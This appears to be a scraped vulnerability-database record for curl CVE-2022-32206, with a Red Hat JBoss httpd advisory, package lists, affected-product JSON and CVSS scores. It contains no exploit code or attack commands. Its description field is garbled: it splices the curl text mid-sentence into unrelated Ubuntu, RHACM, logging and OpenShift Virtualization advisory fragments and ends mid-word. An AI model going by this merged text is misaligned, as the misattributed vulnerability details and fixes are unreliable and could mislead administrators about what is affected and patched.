virt-cdi-operator-container-v4.11.1-5 virt-cdi-uploadserver-container-v4.11.1-5 virt-cdi-apiserver-container-v4.11.1-5 virt-cdi-importer-container-v4.11.1-5 virt-cdi-controller-container-v4.11.1-5 virt-cdi-cloner-container-v4.11.1-5 virt-cdi-uploadproxy-container-v4.11.1-5 checkup-framework-container-v4.11.1-3 kubevirt-tekton-tasks-wait-for-vmi-status-container-v4.11.1-7 kubevirt-tekton-tasks-create-datavolume-container-v4.11.1-7 kubevirt-template-validator-container-v4.11.1-4 virt-handler-container-v4.11.1-5 hostpath-provisioner-operator-container-v4.11.1-4 virt-api-container-v4.11.1-5 vm-network-latency-checkup-container-v4.11.1-3 cluster-network-addons-operator-container-v4.11.1-5 virtio-win-container-v4.11.1-4 virt-launcher-container-v4.11.1-5 ovs-cni-marker-container-v4.11.1-5 hyperconverged-cluster-webhook-container-v4.11.1-7 virt-controller-container-v4.11.1-5 virt-artifacts-server-container-v4.11.1-5 kubevirt-tekton-tasks-modify-vm-template-container-v4.11.1-7 kubevirt-tekton-tasks-disk-virt-customize-container-v4.11.1-7 libguestfs-tools-container-v4.11.1-5 hostpath-provisioner-container-v4.11.1-4 kubevirt-tekton-tasks-disk-virt-sysprep-container-v4.11.1-7 kubevirt-tekton-tasks-copy-template-container-v4.11.1-7 cnv-containernetworking-plugins-container-v4.11.1-5 bridge-marker-container-v4.11.1-5 virt-operator-container-v4.11.1-5 hostpath-csi-driver-container-v4.11.1-4 kubevirt-tekton-tasks-create-vm-from-template-container-v4.11.1-7 kubemacpool-container-v4.11.1-5 hyperconverged-cluster-operator-container-v4.11.1-7 kubevirt-ssp-operator-container-v4.11.1-4 ovs-cni-plugin-container-v4.11.1-5 kubevirt-tekton-tasks-cleanup-vm-container-v4.11.1-7 kubevirt-tekton-tasks-operator-container-v4.11.1-2 cnv-must-gather-container-v4.11.1-8 kubevirt-console-plugin-container-v4.11.1-9 hco-bundle-registry-container-v4.11.1-49
- -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Moderate: Red Hat JBoss Core Services Apache HTTP Server 2.4.51 SP1 security update Advisory ID: RHSA-2022:8840-01 Product: Red Hat JBoss Core Services Advisory URL: https://access.redhat.com/errata/RHSA-2022:8840 Issue date: 2022-12-08 CVE Names: CVE-2022-1292 CVE-2022-2068 CVE-2022-22721 CVE-2022-23943 CVE-2022-26377 CVE-2022-28330 CVE-2022-28614 CVE-2022-28615 CVE-2022-30522 CVE-2022-31813 CVE-2022-32206 CVE-2022-32207 CVE-2022-32208 CVE-2022-32221 CVE-2022-35252 CVE-2022-42915 CVE-2022-42916 ==================================================================== 1. Summary:
An update is now available for Red Hat JBoss Core Services.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat JBoss Core Services on RHEL 7 Server - noarch, x86_64 Red Hat JBoss Core Services on RHEL 8 - noarch, x86_64
- Description:
Red Hat JBoss Core Services is a set of supplementary software for Red Hat JBoss middleware products. This software, such as Apache HTTP Server, is common to multiple JBoss middleware products, and is packaged under Red Hat JBoss Core Services to allow for faster distribution of updates, and for a more consistent update experience.
This release of Red Hat JBoss Core Services Apache HTTP Server 2.4.51 Service Pack 1 serves as a replacement for Red Hat JBoss Core Services Apache HTTP Server 2.4.51, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.
Security Fix(es):
-
curl: HSTS bypass via IDN (CVE-2022-42916)
-
curl: HTTP proxy double-free (CVE-2022-42915)
-
curl: POST following PUT confusion (CVE-2022-32221)
-
httpd: mod_proxy: X-Forwarded-For dropped by hop-by-hop mechanism (CVE-2022-31813)
-
httpd: mod_sed: DoS vulnerability (CVE-2022-30522)
-
httpd: out-of-bounds read in ap_strcmp_match() (CVE-2022-28615)
-
httpd: out-of-bounds read via ap_rwrite() (CVE-2022-28614)
-
httpd: mod_proxy_ajp: Possible request smuggling (CVE-2022-26377)
-
curl: control code in cookie denial of service (CVE-2022-35252)
-
jbcs-httpd24-httpd: httpd: mod_isapi: out-of-bounds read (CVE-2022-28330)
-
curl: Unpreserved file permissions (CVE-2022-32207)
-
curl: various flaws (CVE-2022-32206 CVE-2022-32208)
-
openssl: the c_rehash script allows command injection (CVE-2022-2068)
-
openssl: c_rehash script allows command injection (CVE-2022-1292)
-
jbcs-httpd24-httpd: httpd: core: Possible buffer overflow with very large or unlimited LimitXMLRequestBody (CVE-2022-22721)
-
jbcs-httpd24-httpd: httpd: mod_sed: Read/write beyond bounds (CVE-2022-23943)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
Applications using the APR libraries, such as httpd, must be restarted for this update to take effect. After installing the updated packages, the httpd daemon will be restarted automatically.
- Bugs fixed (https://bugzilla.redhat.com/):
2064319 - CVE-2022-23943 httpd: mod_sed: Read/write beyond bounds 2064320 - CVE-2022-22721 httpd: core: Possible buffer overflow with very large or unlimited LimitXMLRequestBody 2081494 - CVE-2022-1292 openssl: c_rehash script allows command injection 2094997 - CVE-2022-26377 httpd: mod_proxy_ajp: Possible request smuggling 2095000 - CVE-2022-28330 httpd: mod_isapi: out-of-bounds read 2095002 - CVE-2022-28614 httpd: Out-of-bounds read via ap_rwrite() 2095006 - CVE-2022-28615 httpd: Out-of-bounds read in ap_strcmp_match() 2095015 - CVE-2022-30522 httpd: mod_sed: DoS vulnerability 2095020 - CVE-2022-31813 httpd: mod_proxy: X-Forwarded-For dropped by hop-by-hop mechanism 2097310 - CVE-2022-2068 openssl: the c_rehash script allows command injection 2099300 - CVE-2022-32206 curl: HTTP compression denial of service 2099305 - CVE-2022-32207 curl: Unpreserved file permissions 2099306 - CVE-2022-32208 curl: FTP-KRB bad message verification 2120718 - CVE-2022-35252 curl: control code in cookie denial of service 2135411 - CVE-2022-32221 curl: POST following PUT confusion 2135413 - CVE-2022-42915 curl: HTTP proxy double-free 2135416 - CVE-2022-42916 curl: HSTS bypass via IDN
- Package List:
Red Hat JBoss Core Services on RHEL 7 Server:
Source: jbcs-httpd24-apr-util-1.6.1-99.el7jbcs.src.rpm jbcs-httpd24-curl-7.86.0-2.el7jbcs.src.rpm jbcs-httpd24-httpd-2.4.51-37.el7jbcs.src.rpm jbcs-httpd24-mod_http2-1.15.19-20.el7jbcs.src.rpm jbcs-httpd24-mod_jk-1.2.48-44.redhat_1.el7jbcs.src.rpm jbcs-httpd24-mod_md-2.4.0-18.el7jbcs.src.rpm jbcs-httpd24-mod_proxy_cluster-1.3.17-13.el7jbcs.src.rpm jbcs-httpd24-mod_security-2.9.3-22.el7jbcs.src.rpm jbcs-httpd24-nghttp2-1.43.0-11.el7jbcs.src.rpm jbcs-httpd24-openssl-1.1.1k-13.el7jbcs.src.rpm jbcs-httpd24-openssl-chil-1.0.0-17.el7jbcs.src.rpm jbcs-httpd24-openssl-pkcs11-0.4.10-32.el7jbcs.src.rpm
noarch: jbcs-httpd24-httpd-manual-2.4.51-37.el7jbcs.noarch.rpm
x86_64: jbcs-httpd24-apr-util-1.6.1-99.el7jbcs.x86_64.rpm jbcs-httpd24-apr-util-debuginfo-1.6.1-99.el7jbcs.x86_64.rpm jbcs-httpd24-apr-util-devel-1.6.1-99.el7jbcs.x86_64.rpm jbcs-httpd24-apr-util-ldap-1.6.1-99.el7jbcs.x86_64.rpm jbcs-httpd24-apr-util-mysql-1.6.1-99.el7jbcs.x86_64.rpm jbcs-httpd24-apr-util-nss-1.6.1-99.el7jbcs.x86_64.rpm jbcs-httpd24-apr-util-odbc-1.6.1-99.el7jbcs.x86_64.rpm jbcs-httpd24-apr-util-openssl-1.6.1-99.el7jbcs.x86_64.rpm jbcs-httpd24-apr-util-pgsql-1.6.1-99.el7jbcs.x86_64.rpm jbcs-httpd24-apr-util-sqlite-1.6.1-99.el7jbcs.x86_64.rpm jbcs-httpd24-curl-7.86.0-2.el7jbcs.x86_64.rpm jbcs-httpd24-curl-debuginfo-7.86.0-2.el7jbcs.x86_64.rpm jbcs-httpd24-httpd-2.4.51-37.el7jbcs.x86_64.rpm jbcs-httpd24-httpd-debuginfo-2.4.51-37.el7jbcs.x86_64.rpm jbcs-httpd24-httpd-devel-2.4.51-37.el7jbcs.x86_64.rpm jbcs-httpd24-httpd-selinux-2.4.51-37.el7jbcs.x86_64.rpm jbcs-httpd24-httpd-tools-2.4.51-37.el7jbcs.x86_64.rpm jbcs-httpd24-libcurl-7.86.0-2.el7jbcs.x86_64.rpm jbcs-httpd24-libcurl-devel-7.86.0-2.el7jbcs.x86_64.rpm jbcs-httpd24-mod_http2-1.15.19-20.el7jbcs.x86_64.rpm jbcs-httpd24-mod_http2-debuginfo-1.15.19-20.el7jbcs.x86_64.rpm jbcs-httpd24-mod_jk-ap24-1.2.48-44.redhat_1.el7jbcs.x86_64.rpm jbcs-httpd24-mod_jk-debuginfo-1.2.48-44.redhat_1.el7jbcs.x86_64.rpm jbcs-httpd24-mod_ldap-2.4.51-37.el7jbcs.x86_64.rpm jbcs-httpd24-mod_md-2.4.0-18.el7jbcs.x86_64.rpm jbcs-httpd24-mod_md-debuginfo-2.4.0-18.el7jbcs.x86_64.rpm jbcs-httpd24-mod_proxy_cluster-1.3.17-13.el7jbcs.x86_64.rpm jbcs-httpd24-mod_proxy_cluster-debuginfo-1.3.17-13.el7jbcs.x86_64.rpm jbcs-httpd24-mod_proxy_html-2.4.51-37.el7jbcs.x86_64.rpm jbcs-httpd24-mod_security-2.9.3-22.el7jbcs.x86_64.rpm jbcs-httpd24-mod_security-debuginfo-2.9.3-22.el7jbcs.x86_64.rpm jbcs-httpd24-mod_session-2.4.51-37.el7jbcs.x86_64.rpm jbcs-httpd24-mod_ssl-2.4.51-37.el7jbcs.x86_64.rpm jbcs-httpd24-nghttp2-1.43.0-11.el7jbcs.x86_64.rpm jbcs-httpd24-nghttp2-debuginfo-1.43.0-11.el7jbcs.x86_64.rpm jbcs-httpd24-nghttp2-devel-1.43.0-11.el7jbcs.x86_64.rpm jbcs-httpd24-openssl-1.1.1k-13.el7jbcs.x86_64.rpm jbcs-httpd24-openssl-chil-1.0.0-17.el7jbcs.x86_64.rpm jbcs-httpd24-openssl-chil-debuginfo-1.0.0-17.el7jbcs.x86_64.rpm jbcs-httpd24-openssl-debuginfo-1.1.1k-13.el7jbcs.x86_64.rpm jbcs-httpd24-openssl-devel-1.1.1k-13.el7jbcs.x86_64.rpm jbcs-httpd24-openssl-libs-1.1.1k-13.el7jbcs.x86_64.rpm jbcs-httpd24-openssl-perl-1.1.1k-13.el7jbcs.x86_64.rpm jbcs-httpd24-openssl-pkcs11-0.4.10-32.el7jbcs.x86_64.rpm jbcs-httpd24-openssl-pkcs11-debuginfo-0.4.10-32.el7jbcs.x86_64.rpm jbcs-httpd24-openssl-static-1.1.1k-13.el7jbcs.x86_64.rpm
Red Hat JBoss Core Services on RHEL 8:
Source: jbcs-httpd24-apr-util-1.6.1-99.el8jbcs.src.rpm jbcs-httpd24-curl-7.86.0-2.el8jbcs.src.rpm jbcs-httpd24-httpd-2.4.51-37.el8jbcs.src.rpm jbcs-httpd24-mod_http2-1.15.19-20.el8jbcs.src.rpm jbcs-httpd24-mod_jk-1.2.48-44.redhat_1.el8jbcs.src.rpm jbcs-httpd24-mod_md-2.4.0-18.el8jbcs.src.rpm jbcs-httpd24-mod_proxy_cluster-1.3.17-13.el8jbcs.src.rpm jbcs-httpd24-mod_security-2.9.3-22.el8jbcs.src.rpm jbcs-httpd24-nghttp2-1.43.0-11.el8jbcs.src.rpm jbcs-httpd24-openssl-1.1.1k-13.el8jbcs.src.rpm jbcs-httpd24-openssl-chil-1.0.0-17.el8jbcs.src.rpm jbcs-httpd24-openssl-pkcs11-0.4.10-32.el8jbcs.src.rpm
noarch: jbcs-httpd24-httpd-manual-2.4.51-37.el8jbcs.noarch.rpm
x86_64: jbcs-httpd24-apr-util-1.6.1-99.el8jbcs.x86_64.rpm jbcs-httpd24-apr-util-debuginfo-1.6.1-99.el8jbcs.x86_64.rpm jbcs-httpd24-apr-util-devel-1.6.1-99.el8jbcs.x86_64.rpm jbcs-httpd24-apr-util-ldap-1.6.1-99.el8jbcs.x86_64.rpm jbcs-httpd24-apr-util-ldap-debuginfo-1.6.1-99.el8jbcs.x86_64.rpm jbcs-httpd24-apr-util-mysql-1.6.1-99.el8jbcs.x86_64.rpm jbcs-httpd24-apr-util-mysql-debuginfo-1.6.1-99.el8jbcs.x86_64.rpm jbcs-httpd24-apr-util-nss-1.6.1-99.el8jbcs.x86_64.rpm jbcs-httpd24-apr-util-nss-debuginfo-1.6.1-99.el8jbcs.x86_64.rpm jbcs-httpd24-apr-util-odbc-1.6.1-99.el8jbcs.x86_64.rpm jbcs-httpd24-apr-util-odbc-debuginfo-1.6.1-99.el8jbcs.x86_64.rpm jbcs-httpd24-apr-util-openssl-1.6.1-99.el8jbcs.x86_64.rpm jbcs-httpd24-apr-util-openssl-debuginfo-1.6.1-99.el8jbcs.x86_64.rpm jbcs-httpd24-apr-util-pgsql-1.6.1-99.el8jbcs.x86_64.rpm jbcs-httpd24-apr-util-pgsql-debuginfo-1.6.1-99.el8jbcs.x86_64.rpm jbcs-httpd24-apr-util-sqlite-1.6.1-99.el8jbcs.x86_64.rpm jbcs-httpd24-apr-util-sqlite-debuginfo-1.6.1-99.el8jbcs.x86_64.rpm jbcs-httpd24-curl-7.86.0-2.el8jbcs.x86_64.rpm jbcs-httpd24-curl-debuginfo-7.86.0-2.el8jbcs.x86_64.rpm jbcs-httpd24-httpd-2.4.51-37.el8jbcs.x86_64.rpm jbcs-httpd24-httpd-debuginfo-2.4.51-37.el8jbcs.x86_64.rpm jbcs-httpd24-httpd-devel-2.4.51-37.el8jbcs.x86_64.rpm jbcs-httpd24-httpd-selinux-2.4.51-37.el8jbcs.x86_64.rpm jbcs-httpd24-httpd-tools-2.4.51-37.el8jbcs.x86_64.rpm jbcs-httpd24-httpd-tools-debuginfo-2.4.51-37.el8jbcs.x86_64.rpm jbcs-httpd24-libcurl-7.86.0-2.el8jbcs.x86_64.rpm jbcs-httpd24-libcurl-debuginfo-7.86.0-2.el8jbcs.x86_64.rpm jbcs-httpd24-libcurl-devel-7.86.0-2.el8jbcs.x86_64.rpm jbcs-httpd24-mod_http2-1.15.19-20.el8jbcs.x86_64.rpm jbcs-httpd24-mod_http2-debuginfo-1.15.19-20.el8jbcs.x86_64.rpm jbcs-httpd24-mod_jk-ap24-1.2.48-44.redhat_1.el8jbcs.x86_64.rpm jbcs-httpd24-mod_jk-ap24-debuginfo-1.2.48-44.redhat_1.el8jbcs.x86_64.rpm jbcs-httpd24-mod_ldap-2.4.51-37.el8jbcs.x86_64.rpm jbcs-httpd24-mod_ldap-debuginfo-2.4.51-37.el8jbcs.x86_64.rpm jbcs-httpd24-mod_md-2.4.0-18.el8jbcs.x86_64.rpm jbcs-httpd24-mod_md-debuginfo-2.4.0-18.el8jbcs.x86_64.rpm jbcs-httpd24-mod_proxy_cluster-1.3.17-13.el8jbcs.x86_64.rpm jbcs-httpd24-mod_proxy_cluster-debuginfo-1.3.17-13.el8jbcs.x86_64.rpm jbcs-httpd24-mod_proxy_html-2.4.51-37.el8jbcs.x86_64.rpm jbcs-httpd24-mod_proxy_html-debuginfo-2.4.51-37.el8jbcs.x86_64.rpm jbcs-httpd24-mod_security-2.9.3-22.el8jbcs.x86_64.rpm jbcs-httpd24-mod_security-debuginfo-2.9.3-22.el8jbcs.x86_64.rpm jbcs-httpd24-mod_session-2.4.51-37.el8jbcs.x86_64.rpm jbcs-httpd24-mod_session-debuginfo-2.4.51-37.el8jbcs.x86_64.rpm jbcs-httpd24-mod_ssl-2.4.51-37.el8jbcs.x86_64.rpm jbcs-httpd24-mod_ssl-debuginfo-2.4.51-37.el8jbcs.x86_64.rpm jbcs-httpd24-nghttp2-1.43.0-11.el8jbcs.x86_64.rpm jbcs-httpd24-nghttp2-debuginfo-1.43.0-11.el8jbcs.x86_64.rpm jbcs-httpd24-nghttp2-devel-1.43.0-11.el8jbcs.x86_64.rpm jbcs-httpd24-openssl-1.1.1k-13.el8jbcs.x86_64.rpm jbcs-httpd24-openssl-chil-1.0.0-17.el8jbcs.x86_64.rpm jbcs-httpd24-openssl-chil-debuginfo-1.0.0-17.el8jbcs.x86_64.rpm jbcs-httpd24-openssl-debuginfo-1.1.1k-13.el8jbcs.x86_64.rpm jbcs-httpd24-openssl-devel-1.1.1k-13.el8jbcs.x86_64.rpm jbcs-httpd24-openssl-libs-1.1.1k-13.el8jbcs.x86_64.rpm jbcs-httpd24-openssl-libs-debuginfo-1.1.1k-13.el8jbcs.x86_64.rpm jbcs-httpd24-openssl-perl-1.1.1k-13.el8jbcs.x86_64.rpm jbcs-httpd24-openssl-pkcs11-0.4.10-32.el8jbcs.x86_64.rpm jbcs-httpd24-openssl-pkcs11-debuginfo-0.4.10-32.el8jbcs.x86_64.rpm jbcs-httpd24-openssl-static-1.1.1k-13.el8jbcs.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2022-1292 https://access.redhat.com/security/cve/CVE-2022-2068 https://access.redhat.com/security/cve/CVE-2022-22721 https://access.redhat.com/security/cve/CVE-2022-23943 https://access.redhat.com/security/cve/CVE-2022-26377 https://access.redhat.com/security/cve/CVE-2022-28330 https://access.redhat.com/security/cve/CVE-2022-28614 https://access.redhat.com/security/cve/CVE-2022-28615 https://access.redhat.com/security/cve/CVE-2022-30522 https://access.redhat.com/security/cve/CVE-2022-31813 https://access.redhat.com/security/cve/CVE-2022-32206 https://access.redhat.com/security/cve/CVE-2022-32207 https://access.redhat.com/security/cve/CVE-2022-32208 https://access.redhat.com/security/cve/CVE-2022-32221 https://access.redhat.com/security/cve/CVE-2022-35252 https://access.redhat.com/security/cve/CVE-2022-42915 https://access.redhat.com/security/cve/CVE-2022-42916 https://access.redhat.com/security/updates/classification/#moderate
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2022 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBY5ISE9zjgjWX9erEAQixuA//dX5Q3wtu2MRvrjD/sK/r6dqBz4fWWhS9 ws2A8cRa5ki3RlCaYQ3pP7LkRtIdankAP3HG1NU4er/odsMEW5aEgku+5foV7w4M WEd0USLKs3Pw5a7/3TjOBUf5CA7oet03C7/u9idWaLD/ip4UMhskSnz33qFQSFZf FAWNdsRhH8+ql6qFMg9Odv5RFX3i2+wBy5pC69Akr2FBEt9j+/PbvSPWuPD26n6H 0l+QUKrI3OW1EHzz+S/8aEfTFKLluXfhVJn61wdA8Kjs4ZKrnBz8czJjxn4hOi7a z0tpzg5d1BJEf/UB7EdyyLBGRIliWhf978qtG8QS37GEgnQSof2xgcfu1NGiHl9j ypCqX1R4oOkeoISynnZUKWZ1uFp5GkMiRtPu0Bw7WYB6z/8OWZce4yIqh1rcG09d NcyleabDtpJ7C3BJQzpnhXAWjri7oJ6wHBvcbQ9sLj2xkQRX2Zpi0KJGIH8iLwdn Ik+RIZ7u/mXeW3ulcwiQTPYbTQLWGXqgZV1qxJq91HIcu+y3STQwZjb4fZuqjH5M onO/rF2y50l9LqArg/v9KAJUbHSKMDP6r7Dx02J+iKjW3g7NczoImrU7JcyAgce9 mCN7gMmU9bQx1tagIKcKKW5IVN/jHyWKJW/t0teoaECsa2LMgoEIt+6RcmQXWpdF 6t6oQh+b3NY=UGfz -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . Description:
The curl packages provide the libcurl library and the curl utility for downloading files from servers using various protocols, including HTTP, FTP, and LDAP. Bugs fixed (https://bugzilla.redhat.com/):
2099300 - CVE-2022-32206 curl: HTTP compression denial of service 2167815 - CVE-2023-23916 curl: HTTP multi-header compression denial of service
6
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "scalance sc646-2c",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "3.0"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "eq",
"trust": 1.0,
"vendor": "splunk",
"version": "9.1.0"
},
{
"_id": null,
"model": "clustered data ontap",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "35"
},
{
"_id": null,
"model": "bootstrap os",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "solidfire",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "universal forwarder",
"scope": "lt",
"trust": 1.0,
"vendor": "splunk",
"version": "9.0.6"
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "universal forwarder",
"scope": "gte",
"trust": 1.0,
"vendor": "splunk",
"version": "9.0.0"
},
{
"_id": null,
"model": "scalance sc622-2c",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "3.0"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "lt",
"trust": 1.0,
"vendor": "splunk",
"version": "8.2.12"
},
{
"_id": null,
"model": "hci management node",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "element software",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "11.0"
},
{
"_id": null,
"model": "scalance sc642-2c",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "3.0"
},
{
"_id": null,
"model": "curl",
"scope": "lt",
"trust": 1.0,
"vendor": "haxx",
"version": "7.84.0"
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "10.0"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "gte",
"trust": 1.0,
"vendor": "splunk",
"version": "8.2.0"
},
{
"_id": null,
"model": "scalance sc632-2c",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "3.0"
},
{
"_id": null,
"model": "scalance sc626-2c",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "3.0"
},
{
"_id": null,
"model": "scalance sc636-2c",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "3.0"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2022-32206"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "168538"
},
{
"db": "PACKETSTORM",
"id": "168275"
},
{
"db": "PACKETSTORM",
"id": "170741"
},
{
"db": "PACKETSTORM",
"id": "168347"
},
{
"db": "PACKETSTORM",
"id": "170083"
},
{
"db": "PACKETSTORM",
"id": "170166"
},
{
"db": "PACKETSTORM",
"id": "172765"
},
{
"db": "PACKETSTORM",
"id": "168284"
}
],
"trust": 0.8
},
"cve": "CVE-2022-32206",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2022-32206",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.8,
"id": "CVE-2022-32206",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2022-32206",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2022-32206",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202206-2565",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202206-2565"
},
{
"db": "NVD",
"id": "CVE-2022-32206"
},
{
"db": "NVD",
"id": "CVE-2022-32206"
}
]
},
"description": {
"_id": null,
"data": "curl \u003c 7.84.0 supports \"chained\" HTTP compression algorithms, meaning that a serverresponse can be compressed multiple times and potentially with different algorithms. The number of acceptable \"links\" in this \"decompression chain\" was unbounded, allowing a malicious server to insert a virtually unlimited number of compression steps.The use of such a decompression chain could result in a \"malloc bomb\", makingcurl end up spending enormous amounts of allocated heap memory, or trying toand returning out of memory errors. Harry Sintonen incorrectly handled certain file permissions. \nAn attacker could possibly use this issue to expose sensitive information. \nThis issue only affected Ubuntu 21.10, and Ubuntu 22.04 LTS. (CVE-2022-32207). Clusters and applications are all visible and\nmanaged from a single console\u2014with security policy built in. See the following\nRelease Notes documentation, which will be updated shortly for this\nrelease, for additional details about this release:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.4/html/release_notes/\n\nSecurity fixes:\n\n* golang: crypto/tls: session tickets lack random ticket_age_add\n(CVE-2022-30629)\n\n* moment: inefficient parsing algorithim resulting in DoS (CVE-2022-31129)\n\n* nodejs16: CRLF injection in node-undici (CVE-2022-31150)\n\n* nodejs/undici: Cookie headers uncleared on cross-origin redirect\n(CVE-2022-31151)\n\n* vm2: Sandbox Escape in vm2 (CVE-2022-36067)\n\nBug fixes:\n\n* RHACM 2.4 using deprecated APIs in managed clusters (BZ# 2041540)\n\n* vSphere network name doesn\u0027t allow entering spaces and doesn\u0027t reflect\nYAML changes (BZ# 2074766)\n\n* cluster update status is stuck, also update is not even visible (BZ#\n2079418)\n\n* Policy that creates cluster role is showing as not compliant due to\nRequest entity too large message (BZ# 2088486)\n\n* Upgraded from RHACM 2.2--\u003e2.3--\u003e2.4 and cannot create cluster (BZ#\n2089490)\n\n* ACM Console Becomes Unusable After a Time (BZ# 2097464)\n\n* RHACM 2.4.6 images (BZ# 2100613)\n\n* Cluster Pools with conflicting name of existing clusters in same\nnamespace fails creation and deletes existing cluster (BZ# 2102436)\n\n* ManagedClusters in Pending import state after ACM hub migration (BZ#\n2102495)\n\n3. Bugs fixed (https://bugzilla.redhat.com/):\n\n2041540 - RHACM 2.4 using deprecated APIs in managed clusters\n2074766 - vSphere network name doesn\u0027t allow entering spaces and doesn\u0027t reflect YAML changes\n2079418 - cluster update status is stuck, also update is not even visible\n2088486 - Policy that creates cluster role is showing as not compliant due to Request entity too large message\n2089490 - Upgraded from RHACM 2.2--\u003e2.3--\u003e2.4 and cannot create cluster\n2092793 - CVE-2022-30629 golang: crypto/tls: session tickets lack random ticket_age_add\n2097464 - ACM Console Becomes Unusable After a Time\n2100613 - RHACM 2.4.6 images\n2102436 - Cluster Pools with conflicting name of existing clusters in same namespace fails creation and deletes existing cluster\n2102495 - ManagedClusters in Pending import state after ACM hub migration\n2105075 - CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS\n2109354 - CVE-2022-31150 nodejs16: CRLF injection in node-undici\n2121396 - CVE-2022-31151 nodejs/undici: Cookie headers uncleared on cross-origin redirect\n2124794 - CVE-2022-36067 vm2: Sandbox Escape in vm2\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read\n2107374 - CVE-2022-1705 golang: net/http: improper sanitization of Transfer-Encoding header\n2107383 - CVE-2022-32148 golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nLOG-2647 - Add link to log console from pod views\nLOG-2801 - After upgrade all logs are stored in app indices\nLOG-2917 - Changing refresh interval throws error when the \u0027Query\u0027 field is empty\n\n6. This advisory contains the following\nOpenShift Virtualization 4.12.0 images:\n\nSecurity Fix(es):\n\n* golang: net/http: limit growth of header canonicalization cache\n(CVE-2021-44716)\n\n* kubeVirt: Arbitrary file read on the host from KubeVirt VMs\n(CVE-2022-1798)\n\n* golang: out-of-bounds read in golang.org/x/text/language leads to DoS\n(CVE-2021-38561)\n\n* golang: syscall: don\u0027t close fd 0 on ForkExec error (CVE-2021-44717)\n\n* golang: net/http: improper sanitization of Transfer-Encoding header\n(CVE-2022-1705)\n\n* golang: go/parser: stack exhaustion in all Parse* functions\n(CVE-2022-1962)\n\n* golang: math/big: uncontrolled memory consumption due to an unhandled\noverflow via Rat.SetString (CVE-2022-23772)\n\n* golang: cmd/go: misinterpretation of 